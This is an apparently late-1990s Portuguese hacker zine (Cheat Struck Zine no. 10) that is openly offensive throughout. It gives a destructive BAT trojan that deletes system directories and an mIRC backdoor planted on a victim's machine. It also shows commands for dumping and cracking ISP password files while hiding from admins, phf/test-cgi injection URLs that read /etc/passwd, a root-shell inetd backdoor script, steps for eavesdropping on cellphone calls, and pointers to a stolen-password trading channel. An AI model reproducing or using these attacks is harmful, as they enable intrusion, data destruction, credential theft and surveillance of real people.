CCCCCCCC SSSSSSSS ZZZZZZZZ CC SS ZZ CC SS ZZ CC SSSSSSSS ZZ CC SS ZZ CC SS ZZ CCCCCCCC SSSSSSSS ZZZZZZZZ CSZ - Cheat Struck Zine by Cheat Struck No.10 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ Indice $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Seção: Matéria: Assunto: Autor: Nota: 1. Introdução CSZ 10 Cheat Struck --- 2. ICQ Tips Acabando com lamahs no ^DarkLorD^ 9,0 mIRC. 3. Hacking para iniciantes Hackear prov de acesso Cheat Struck 9,5 4. Crackerz Aumentando bytes Cheat Struck 9,0 5. Invasão de privacidade Hack cgi-bin Cheat Struck 10,0 6. Programação Scripts para linux Cheat Struck 8,5 7. Phreaking Telefonia celular Cheat Struck 10,0 8. VIRII tutorial parte2 Cheat Struck 9,0 9. Hack, the Art Novas backdoor's Cheat Struck 10,0 10. Preview Matérias para a CSZ11 Cheat Struck --- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 1. Introdução $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ E ae malucos!!! Estou screvendo essa porra logo depois de sair de um chat com uns amigos(Harris, DeMoN, bash e _DarkLorD_). Hoje foi um ótimo dia se não fosse por um otário chamado #########. O cara eh o maior saco!!! Ficou torrando a minha paciencia soh pq eu tava usando o mIRC(berg :P) para entrar no via-rs. Porra vai encher o sako de outro! Eu tava acabando a zine numero 09 e como eu faço no Ruindows eu não queria reiniciar o computador prar me cone- ctar. Esse cara vem sendo um saco toda a vez q eu encontro ele na via-rs. Para evitar panacas como este, eu vou colocar nesta edição uns tróço trizinho de IRC que te ajudará pacas a acabar com esses lamers que soh enter- rompem o trafico na inet. Bom, mas deixando isso pra lah, eu to com bastante coisa aki pra esse numero, e espero que fique afude. Nos esbarramos por aí. PS: Surgiram vários pedidos de pessoas para serem editores, entaum aí vai as areas q eu to precisando de ajuda: Anarchy, Virii, Programação, Crackerz e Bugz. Para ser um editor, me mande a sua matéria sobre qquer coisa relacionada, eu vou avaliar e talvéz(se ficar bom) vou colocar na zine com o seu nick e e-mail(se quizer). $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 2. IRC Tips $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Atenção!!! Essa seção não eh permanente e tudo oque vc verá aki foi retirado do Imortal Zine e complementado por mim. Essas backdoor's são para os q ainda usam mIRC. Ele consiste em alte- rar os arquivos .INI do mIRC. Vamos começar do inicio... [Entrando] A primeira coisa que veremos eh como entrar no computador do cara. Quando você jah estiver conectado a inet, digite: /dns {nick} Onde {nick} eh o nickname do lamah. Pegue o IP dele e scaneie para localizar a porta em que ele estah. Agora telneteie ao sistema dele, colocando o IP dele como host e use a porta que ele estava usando. Ex: telnet 200.200.200.1:115 Onde 200.200.200.1 é o IP do lamah e 115 a porta. Jah dentro do sys do cara procure pelo file remote1.ini ou apenas remote.ini no diretório do mIRC. Adiciona a seguinte linha: n1=ctcp 1:*: $parm2 *3 Depois do [script]. Se quizer, passe virus prele tb. [Engenharia Social] Isso irá depender um pouco da sua labia. Converse com ele e tente ser amizade do cara. Então diga a ele digi- tar os seguintes comandos: /load -rs remote1.ini ou /load -rs remote.ini Dependendo do file q vc editou. e depois diga prele digitar: /ctcps on [Hackeando] Aí você pergunta: Tah mas o que eu posso fazer com essa backdoor ago- ra??? A resposta estah nestes comandos que vc pode digitar no seu mIRC mesmo: /ctcp {nick} fire /notice #Channel Eu sou GAY! Manero neh? Isso faiz com que o maneh mande a noticia para o #Channel dizendo "Eu sou GAY!". Aki {nick} é o nick do lamah, e #Channel o canal onde a noticia serah dada. Outro tróço trii é quando vc invadir o sistema dele deixe um trojam, pode ser ateh em .BAT, e ai digite: /ctcp {nick} fire /run Trojam.BAT Onde {nick} é o nickname do lamah e Trojam.BAT o nome do trojam, se ele naum estiver no dir do mIRC deverá estar assim: /ctcp {nick} fire /run C:\local\Trojam.BAT Se vc ainda naum entendeu como funciona o esquema, entaum vc eh um desses lamers q serão invadidos pelos + espertos. [Trojam em .BAT] O exemplo de Trojam que vc pode colocar eh: -----Corte aki--------------------------------------------------------------- @echo off :win95 if not exist c:\win95\*.* goto windows deltree c:\win95\ /y > nul :windows if not exist c:\windows\*.* goto dos deltree c:\windows\ /y > nul :dos if not exist c:\dos\*.* goto end deltree c:\dos\ /y > nul :end del C:\command.com del c:\autoexec.bat del c:\config.sys exit -----Corte aki--------------------------------------------------------------- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 3. Hacking para iniciantes $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Aki estão alguns comandos e dicas que você pode usar na hora de hacke ar provedores de acesso a internet. ==========Pegando contas sem senha=========================================== Primeiro, o file q tem todas as contas dos users cadastrados não eh o /etc/passwd e sim o /etc/yppasswd. Se você eh daqueles que não tem saco para descriptar akele mundarel de senhas apenas entaum procure por contas sem senha. Para isso use o cmd: # cat yppasswd | grep :: >> /seu/dir/senhas.txt ou # ypcat passwd | grep :: >> /seu/dir/senhas.txt Onde /seu/dir eh o diretório onde o arquivo de senhas deve ser salva- do, e senhas.txt é o arquivo com as contas sem senha. ==========Pegando todas as contas do provedor================================ Mas se você quizer pegar o passwd inteiro digite: # cat yppasswd >> /seu/dir/senhas.txt ou # ypcat passwd >> /seu/dir/senhas.txt Repare que no primeiro comando(cat) você precisa l9ocalizar o file yppasswd e no segundo naum. ==========Descriptando de uma maneira fácil================================== Pq naum deixar o jack ou o john(isso eh tudo nome de progs seu lamer) descriptando as senhas em outro computador?? Use a sua própria shell para rodar os progs. Assim: 1. Renomeie o progama jack ou john ou qquer outro crackeador para httpd. 2. Renomeie o file de contas para index.http. 3. Se precisar de uma wordlist renomeie-a para applet.java. Note que eh tudo relacionado a http, soh pra enganar o root do sys. 4. Envie-os para a sua shell. 5. Rodoe-os assim: $ ./httpd -pwfile:index.http -wordfile:applet.java -quiet 6. Pressione Ctrl+C para deixar o prog. 7. Digite: nohup ./httpd -restore & Prontinho, o prog está sendo rodado e vc poderá sair a vontade q ele continuarah rodando, pq o servidor da sua shell estarah 24 horas p/ dia cone- ctado. O comando nohup diz para o servidor ignorar a sua saida e continuar rodando o programa, e o & rodarah o prog em background. Apareçarah uma msg de erro, ignorea que o john serah inicializado. Após o carregamento do john, aperte para voltar ao prompt. ==========Outras dicas úteis================================================= Aki tem outras dicas que você pode achar útil: ***Para encontrar contas sem senha: # cat /etc/passwd | grep :: ***Para encontrar a conta do root: # cat /etc/passwd | grep :0:0: ***Para encontrar a conta de algum usuário: # cat /etc/passwd | grep Login_do_user ==========¡¡¡Atenção!!!====================================================== Nunca se logue com a conta original do root, pois sempre que o sys estiver ativado, ele estarah usando-a. A matéria "Descriptando de uma maneira fácil" foi tirada da zine Hack and Phreak e alterada por mim. ==========Faturando senhas fácil, fácil====================================== Eu não iria publicar essa matéria aki porque naum tem nada a ver com hacking. Mas achei enteresante quando eu começei a falar com os caras do ca- nal #senhas. É a maior moleza tu consiguir senhas nesse canal, as vezes tem uns cara que soh entram, digitam uma senha e saem, mas caso isso naum aconte- ça é só vc ter uma senha que vc poderá multiplica-la por ##x. Claro que você naum deve dar a sua senha pro cara neh, naum seja burro porque eles naum pe- gam a senha soh pra se exibir, eles usam. Aki tah os provedores + desejados no #senhas: via-rs datacontrol uol CPOVO nutecnet conex mandic e senhas para numeros 0800(ligação de graça). Porém se vc tiver uma senha de outros provedores, os cara lah tb ace- itam legal. PS: Naum tente trapacea-los que eles testam a senha por telnet e se naum funcionar é ban e kick pra ti. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 4. Crackerz $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Vamos crackear um outro programa simples que criaremos, apenas para pegar bem o tróço. Aki estah a fonte do programa que crackearemos: ;----------Corte aki--------------------------------------------------------- n teste.com a MOV AH,01 MOV CX,0007 INT 10 INT 20 rcx 09 w q ;----------Corte aki--------------------------------------------------------- Salve a fonte como teste.scr e debugue este programa assim: debug < teste.scr A função dele eh mudar o cursor do teclado. Execute-o pelo dos e veja a diferença. Agora, vejamos o que podemos fazer com esse programa. Rode um editor hexadecimal nesse programa e veja como ele irah apare- cer. Exatamente isso: B4 01 B9 07 00 CD 10 CD 20 Onde: B4 01 = MOV AH,01 B9 07 00 = MOV CX, 0007 CD 10 = INT 10 CD 20 = INT 20 Agora que tal nós colocarmos um monte de besteiras apenas para aumen- tar o tamanho do arquivo. Façamos o seguinte: Nos adicionaremos o comando jmp 0180, e no 0180 colocaremos nop. Isso aumentará o arquivo de 9 bytes para 129 bytes. Como fazer isso usando o editor hexadecimal??? Entre no debug novamente e digte: -a 0109 Para começar editar do local onde vc havia acabado. Então coloque o comando jmp 0180. Agora de enter para voltar pro prompt e digite: -a 0180 Para editar o local indicado no comando jmp. Alí coloque nop e pronto o programa está prontinho. Se você quizer fazer isso com algum outro programa veja o numero de bytes que ele tem. Ex: 940 bytes. Abra a calculadora cientifica do Windows e digite o numero de bytes lah, agora mude a opção DEC para HEX. O numero hexa apareceu, no caso seria 3AC. Agora adicione +100 e veja o numero(4AC). Pronto! Vc tem o local onde o comando acabou. Digite no prompt do Debug "a 04AC", sendo que o 04AC aki eh o nosso exemplo. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 5. Invasão de privacidade $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Bah! Tem tanta coisa para colocar aki e no Hack, the Art que eu tenho que criar ateh uma seção nova. Para esta edição eu tava na duvida de que matéria colocaria, a do CGI ou a de hackear bibliotecas de telnet tipo a ufrgs e pucrs. Então eu tirei um cara/coroa e deu cara. Por isso aproveitem a matéria de invasão por CGI. Os dados aki vc tb pode encontrar no Manual Definido de Invasão - CSM escrito por mim mesmo. O que é CGI?? Muitos beginners sabem pra que que serve mas não sabem o que é. CGI ( Common Gateway Interface ) é resumidamente uma ligação entre o programa do servidor e o usuário. Sabe aquelas procuras por palavras que você faz em sites tipo "www.cade.com.br". O que? Você nem sabia que isso existia? Então de uma passada no "cade" e pesquise por qualquer palavra(mesmo que não exista). Depois que a pesquisa tiver sido encerrada e os resultados exibidos, veja o campo do endereço do seu BROWSER, estará algo como: http://www.cade.com/cgi-bin/phf?Qalias="hackers";\touch20%/tmp/bla Bem... Agora que você sabe o que é cgi vamos ao que enteressa: Existem algumas maneiras de burlar o cgi. Aqui vão algumas delas que tem como objetivo pegar o /etc/passwd. *** Phf *** http://www..com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd *** Php *** http://www..com/cgi-bin/php.cgi?%0a/bin/cat%20/etc/passwd *** Query *** http://www..com/cgi-bin/query?%0a/bin/cat%20/etc/passwd *** Test CGI *** http://www..com/cgi-bin/test-cgi?%0A/bin/cat%20/etc/passwd *** Echo *** http://www..com/cgi-bin/echo?%0Acat%20/etc/passwd $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 6. Programação $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Bem... O tutorial de Pascal tah saindo, por enquanto aproveitem a ma- téria que ensina a fazer scripts para UNIX. Scripts no Linux são a mesma coisa que .BAT's no MS-DOS/Win. Eles su- portam qquer comando do linux tipo "cp, mv, cd, pwa" e tb possuem alguns cmds especiais tipo "echo, read, trap, exit, case, loops, test, expr". Nesta matéria veremos apenas os comandos especiais de scripts. Os textos que contem um # na frente são explicativos. ----------Fazendo Scripts---------------------------------------------------- #Comandos especiais para scripts de linux ##### Comando echo ##### Mostra algum texto na tela. Ex: echo "hello world" #Mostrará apenas hello world(sem ""s) Também pode ser usado para adicionar um texto a um arquivo. Ex: echo "hello world" >> file.test #Adicionará o texto hello world no arquivo file.test ##### Comando read ##### Lê algo para uma variavel. Ex: echo "Digite o seu nome:" #Mostra Digite o seu nome: read myname #Coloca o que for digitado na varia- vel myname. echo "Ola" myname #Mostra Ola + o conteudo do myname ##### Comando trap ##### Espera alguem teclar Ctrl + C para executar os comandos. Ex: trap "echo você teclou Ctrl+C" #Ao teclar ctrl+C mostra o txt. trap "echo 'Hello' ; echo 'World'" #Ao teclar ctrl+c mostra o txt assim: Hello World ##### Função case ##### Faz um menu de opções. Ex: echo "Escolha:" #Mostra o txt echo "(D)iretorio (L)ogoff (S)hell" read choice #Coloca o caracter pressionado na variavel choice case $choice in #Caso o choice seja... D) echo "Listando Diretorios..."; #...D então execute estes cmds ls -al ;; L) echo Bye; #...L então execute estes cmds kill -1 0;; S) exit;; #...S então execute estes cmds *) Echo "Erro! Nao e um comando";; #...Qualquer outro então mostra isso esac #finaliza o comando case ##### Comando repeat ##### Faz uma lista das palavrasa. Ex: repeat teste1 teste2 teste3 #Isso mostrará uma lista assim: teste1 teste2 teste3 ##### Comando for ##### Tem a mesma função do repeat porém os subcmds são + chatos. ##### Comando test ##### A sintaxe do test é: test variavel opção variavel As opções são as seguintes: -eq #igual(=) -ne #diferente (<>) -gt #maior (>) -lt #menor (<) -ge #maior ou igual (>=) -le #menor ou igual (<=) Exemplos: test 3 -eq 3 #Mostrará um 0 pois são iguais ##### Comando expr ##### Faz operações numericas. O formato é: expr numero1 operador numero2 Os operadores são: + mais - menos * multiplicação / divisão ^ exponenciação Exemplo: var = expr 4 + 4 #var igual a 8 ¡Atenção! 4+4 é diferente de 4 + 4. var = expr 4+4 #var igual a 4+4 e não igual a 8 ##### Variaveis ##### HOME = Diretório home PS1 = Prompt que vc quer PATH = Caminho dos programas executaveis. Ex: PATH="/bin" #Os programas executaveis serão procurados apenas no diretório /bin TERM = Controle do terminal ----------Fim---------------------------------------------------------------- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 7. Phreaking $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Últimos comandos para programar cellulares motorola via TESTMODE. ----------Ultima parte das funções do TESTMODE (p.6)------------------------- 56# Diagnostico de iluminação. 57x# Chama um modo de Processo x=0, AMPS x=1, NAMPS x=2-4, RESERVADO x=5, sinalização TDMA x=6, sinalização TDMA com loopback antes da decodificação x=7, sinalização TDMA com loopback voice depois da decod. x=8, sinalização TDMA com loopback FACCH depois da decod. x=9, sincronização forçada do TDMA 58# Compander On (compressor e expandidor do Audio) 59# Compander Off (compressor e expandidor do Audio) 60# nenhuma funcão 61# Transferidor ESN 62# liga o Ringer Audio Path 63# desliga o Ringer Audio Path 64# Desconhecida 65# Desconhecida 66# Identifica o Transferidor de ESN e NAM. Veja comando 80#. 67# Desconhecida 68# Mostra informação sobre o FLEX e o Modelo 69# Usado com 66# para Identificar o Transferidor. 70# Abrevia o transmissor de audio com FCC ID ABZ89FT5668. 71# Abrevia o ajustamento de força com FCC ID ABZ89FT5668. 72# Mostra a face do transmissor de audio. 73# Mostra a face do ajustamento de força. 74# Desconhecido 75# Desconhecido 76# Desconhecido 77# Desconhecido 78# Desconhecido 79# Desconhecido 80*# Identificação corrente do Transferidor. Isso não é o transferidor do ESN *=0, informação sobre os transferidores NAM *=1, nomes & numeros de telephonena memória *=2, Transferidores C-Scan SID's ----------Fim---------------------------------------------------------------- Corrigindo o erro editado na primeira parte desses comandos, não são 99 comandos e sim 80. Agora que acabamos de ver os comandos do TESTMODE vamos phreakear com ele, que a meu respeito é uma das maneiras mais tri de se phreakear. ***** Tomando controle de Canais ***** Cada conversa telefonica é feita em canais. As conversas de telefones com linha tb usam canais, porém vc não pode controla-los pois é transmitido através de um fio telefonico em quanto as de cellulares são transmitidas por ondas. Veja o desenho: +-----------+ | |.'^'._.'^'._.'^'._.'^'._'^'o o.'^'._.'^'._.'^'._.'^'| Central | | | | | | | +-----------+ | | +-------+ +-------+ | ===== | | ===== | | | | | | 1 2 3 | | 1 2 3 | | 4 5 6 | | 4 5 6 | | 7 8 9 | | 7 8 9 | | * 0 # | | * 0 # | | | | | +-------+ +-------+ Celular2 Celular1 O celular1 e o celular2 se interligam atravéz de um canal. Se este canal não existisse o que aconteceria seria o seguinte: +-----------+ +----------+ | |.'^'._.'^'._.'^'._.'^'._'^'._.'^'._| celular1 | | Central | +----------+ | | +-----------+'^'. ( ( '._.'^'. ) '. '._.'^'. +----------+ ( ) '| celular4 | ) ( +----------+ ( '. +----------+ +----------+ | celular2 | | celular3 | +----------+ +----------+ Isso geraria a famosa "linha cruzada". Então cada conversa tem o seu canal, ou seja: o celular1 e o celular2 tem o seu e o celular3 e 4 o seu, pra não gerar a "linha cruzada". A "linha cruzada" é gerada sempre que + de dois telephones usam o mesmo canal. Vamos então phreakear a conversa telefonica feita em qquer canal. Primeiro nos devemos descobrir o canal que eles estão, utilizando um scaneador de canais. O scaneador padrão é o 36#. Então digite: 3610000# Isso exibirá todos os canais acessados de 10 em 10 segundos. Quando vc achar um canal digite * para parar de mostrar e # para sair. Agora você deve ligar o Receptor de Audio(RX). Para isso digite: 10# Agora é só vc mudar o seu canal atual para o que vc detectou com o scaneador. Para isso digite: 11****# Onde o **** é o canal. Pronto! Você se meteu no meio do canal onde os dois carinhas conver- savam. Assim que nem o desenho: +-----------+ | | o_.'^'._.'^'._.'^'._.'^'.| Central |.'^'._.'^'._.'^'._.'^'._.o | | | | | +-----------+ | | ( | +-------+ ) +-------+ | ===== | ( | ===== | | | ) | | | 1 2 3 | +----------+ | 1 2 3 | | 4 5 6 | | você | | 4 5 6 | | 7 8 9 | +----------+ | 7 8 9 | | * 0 # | | * 0 # | | | | | +-------+ +-------+ celular1 celular2 Você mandou um sinal para a central dizendo que está conversando com alguem utilizando o mesmo canal que o celular1 e o celular2. Agora você pode ouvi-los porém eles naum podem te ouvir. Na próxima edição veremos o q nós podemos fazer no canal e tb apren- der uns outros truques de phreaking. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 8. VIRII $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ----------Manual-de-Criação-de-Virus-by-Cheat-Struck-(parte2)---------------- [[[[[ Encryptação ]]]]] É um passo muito importante do virus, exencial para q não seja desco- berto. Como isso é algo muito complexo, deixarei para explicar em alguma ed- ição futura. [[[[[ Função ]]]]] É resumidamente o que o virus irá fazer com o sistema do usuario in- fectado. Pode conter alguma data para a sua ativação, o que é bem comum. Aki estão algumas coisas que o virus poderá fazer: 1. Deixar o sistema mais lento. 2. Deleção de arquivos. 3. Mostrar messagens 4. Apagar/Trocar as tabelas de partição/Setor de Boot/FAT do disco rígido [[[[[ Virus Residentes ]]]]] Os virus residentes são akeles que se gravam na memória. Para isso ele segue os seguintes passos: 1. Encontrar o tamanho da memória 2. Encolher a memória do programa para o total de memoria (tamanho do virus) 3. Alocar memoria para o virus (esse ira ser na área de memoria alta) 4. Mudar o MCB do programa para o fim da corrente 5. Copiar o virus para a memória alta 6. Salve os vetores de interrupção antigo se o virus deseja acorentar vetores 7. Mudar os vetores de interrupção para a localização apropriada na memória alta . Eles tem como privilégio: o tamanho, que na maioria das vezes é menor do que os runtimes; a efetividade, são mais virulentos do que os runtimes; a velocidade; e a camuflagem que sempre é indispensavél. Os virus runtimes são akeles que apenas infectam e depois se deletam do hard disk. ----------Fim---------------------------------------------------------------- Tah, é isso?? E cade as fontes e os comandos que eu tenho que botar?? Se vc fez essa pergunta vc não é um hacker, vc é uma lamah no meio da internet onde escorregou Bill Gates. Você pode não ter aprendido muito com o tutorial de Assembly(publicado nas edições passadas) mas quem mandou você es- tudar hack apenas por essa zine. Vah procura uns tutoriais de assembly na net que tenham akelas poucas 30 - 40 paginas, porque eu não vou gastar + edições da zine para publicar todos os segredos da linguagem. Na próxima edição vamos estudar os virus em pascal junto com a lingu- agem na programação. O compilador de pascal é TPC.EXE(jah vá arranjando-o). $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 9. Hack, the Art $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Vamos ver mais alguns exemplos de backdoor's. ***** Adicionando serviços ***** Vamos adicionar um serviço pela porta 1111. Edite o arquivo /etc/services e adicione a seguinte linha: cnn 1111/tcp cnn Edite o arquivo /etc/inetd.conf e adicione esta linha: cnn stream tcp nowait root /bin/sh sh -i Agora edite o /etc/hosts.deny e delete a linha all:all PAra facilitar a sua vida aki tem um script que fará esse trabalho 'sujo' para você. ----------backdoor.c--------------------------------------------------------- echo "cnn 1111/tcp cnn" >> /etc/services echo "cnn stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf rm /etc/hosts.deny echo "" >> /etc/hosts.deny ----------------------------------------------------------------------------- ***** Fazendo novas backdoors ***** Vc pode fazer várias outras backdoor's usando os procedimentos acima, tipo: Uma vez coloquei uma backdoor no telnet do sistema do lamer aí qquer um que loga-se por telnet teria nível de root. Para fazer isso apenas edite o /etc/inetd.conf e procure a linha : telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.telnetd E substitua por : telnet stream tcp nowait root /bin/sh /bin/sh -i Edite também o /etc/hosts.allow e acressente a linha: all:all E pronto a backdoor está feita. Porém essa backdoor é muito fácil de ser encontrada por usuarios de experiencia média. Serve apenas para sistemas de lamers. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 10. Preview $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Materias para a CSZ numero 11(se sair). * Phreaking 'Novos truques para celulares * Programação 'Tutorial de pascal * VIRII 'Virus em pascal * Invasão de privacidade 'Invadindo por ICQ * Hack, the Art 'Como hackear bibliotecas por telnet $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ ¡BONUS! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -=-=-=TOP10=-=-=- Os melhores materiais hacks brasileiros, encontrados na inet. 1. Zine Axur05 2. Zine Hack n' Phreak 3. Mask's HomePage v.II ( www.geocities.com/SiliconValley/Lab/2250 ) 4. Hack n' Phreak HomePage ( www.geocities.com/SiliconValley/Peaks/1292 ) 5. Zine Near(z) 6. BlackMask home page( www.blackmask.base.org ) 7. Zine UHF 8. UHF Home page ( www.uhf.base.org ) 9. Zine RWX 10. Zine Quebra de Sigilo -=-=-=FTP de provedores=-=-=- Url's de provedores do RS quase todos saum de poa e fáceis de hackear qbserver.qbnet.com.br (qbnet) emrede.com.br (emrede) rubi.netmarket.com.br (netmarket) tca-nt.com.br (tca internet provider) dolar.vanet.com.br (vanet internet solutions) ftp.mandic.com.br (mandic) nh.conex.com.br (conex brasil-noia) poa01.datacontrol.com.br (datacontrol net) ftp.nutecnet.com.br (nutecnet) ftp.hotnet.com.br (hotnet) omega.procergs.com.br (via-rs) $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ FFFFFFFFFFFF IIII NNNN NNN FFFFFFFFFFFF IIII NNNNNN NNN FFFF NNN NNN NNN FFFF IIII NNN NNN NNN FFFFFFFFFFFF IIII NNN NNN NNN FFFFFFFFFFFF IIII NNN NNN NNN FFFF IIII NNN NNN NNN FFFF IIII NNN NNNNNN FFFF IIII NNN NNNNN FFFF IIII NNN NNNN $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Este zine é escrito por Cheat Struck. No e-mail; No page; No ICQ; No IP fixed, IP spoofed; A unica maneira de me acharem na inet é: server irc.via-rs.com.br:6667 canais #via-rs #hackers #senhas #UKE #CSCHANNEL (canal fundado recentemente por mim, nem sempre no ar) Quando Sextas e Sabados(raramente) das 12:00 as 6:00